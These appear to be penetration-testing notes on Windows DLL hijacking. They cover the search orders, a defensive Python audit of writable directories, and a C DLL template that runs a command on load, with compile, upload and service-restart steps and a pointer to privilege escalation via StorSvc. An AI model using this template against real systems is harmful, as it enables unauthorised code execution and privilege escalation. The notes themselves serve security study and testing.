# DLL Hijacking

## Basics

### Search Orders
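* With __SafeDllSearchMode__ enabled, directories are searched in the following order:
    * __Application directory__ (the directory the executable was loaded from)
    * System directory, `GetSystemDirectory`
    * 16-bit system directory
    * Windows directory, `GetWindowsDirectory`
    * __Current working directory__ of the process
    * Directories in the PATH environment variable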

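* With __SafeDllSearchMode__ disabled, the current working directory moves up to second place:
    * __Application directory__ (the directory the executable was loaded from)
    * __Current working directory__ of the process
    * System directory
    * 16-bit system directory
    * Windows directory
    * Directories in the PATH environment variable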
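
The following audit sketch is an added example, not part of the original notes. It models only the two orders listed above and reports which directories writable by non-admins are searched before the directory that actually resolves a DLL. The names `Context`, `search_order` and `audit` and the sample host are assumptions, and mechanisms outside these lists (such as KnownDLLs) are not modelled.

```python
from dataclasses import dataclass

@dataclass
class Context:
    app_dir: str                      # directory the executable was loaded from
    cwd: str                          # current working directory of the process
    path: list                        # entries of the PATH environment variable
    system_dir: str = r"C:\Windows\System32"
    system16_dir: str = r"C:\Windows\System"
    windows_dir: str = r"C:\Windows"

def norm(d):
    return d.rstrip("\\").lower()     # Windows paths are case-insensitive

def search_order(ctx, safe_mode=True):
    """Directories in the order listed above, duplicates removed."""
    system = [ctx.system_dir, ctx.system16_dir, ctx.windows_dir]
    if safe_mode:
        dirs = [ctx.app_dir, *system, ctx.cwd, *ctx.path]
    else:
        dirs = [ctx.app_dir, ctx.cwd, *system, *ctx.path]
    seen, ordered = set(), []
    for d in dirs:
        if norm(d) not in seen:
            seen.add(norm(d))
            ordered.append(d)
    return ordered

def audit(dll, ctx, files, writable, safe_mode=True):
    """Return (resolving directory or None, writable directories searched before it)."""
    present = {norm(d): {f.lower() for f in names} for d, names in files.items()}
    weak = {norm(d) for d in writable}
    exposed = []
    for d in search_order(ctx, safe_mode):
        if dll.lower() in present.get(norm(d), set()):
            return d, exposed
        if norm(d) in weak:
            exposed.append(d)
    return None, exposed

# Constructed sample host, not taken from a real system.
CTX = Context(app_dir=r"C:\Program Files\Svc", cwd=r"C:\Users\Public\Work",
              path=[r"C:\Windows\System32", r"C:\Tools\bin"])
FILES = {r"C:\Windows\System32": {"version.dll"}}
WRITABLE = [r"C:\Users\Public\Work", r"C:\Tools\bin"]

if __name__ == "__main__":
    for name, mode in [("version.dll", True), ("version.dll", False), ("missing.dll", True)]:
        print(name, "SafeDllSearchMode =", mode, audit(name, CTX, FILES, WRITABLE, mode))
```

An empty second element means no writable directory precedes the resolving one; a result of `None` with a non-empty list marks a missing DLL whose lookup passes through writable locations, which is where directory ACLs should be tightened.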

### Template
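```C
#include <windows.h>
#include <stdlib.h>  /* system() */

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    /* DLL_PROCESS_ATTACH fires once, when the DLL is mapped into the loading process */
    if (dwReason == DLL_PROCESS_ATTACH) {
        /* Records the account the loading process runs as */
        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
        ExitProcess(0);
    }
    return TRUE;
}
```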
* Compilation via
```sh
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
```
* Upload to target
* Restart the `dllsvc` service via
```sh
sc stop dllsvc
sc start dllsvc
```

## LPE via StorSvc

* [BlackArrowSec's repository](https://t.co/8XMvewhgFn)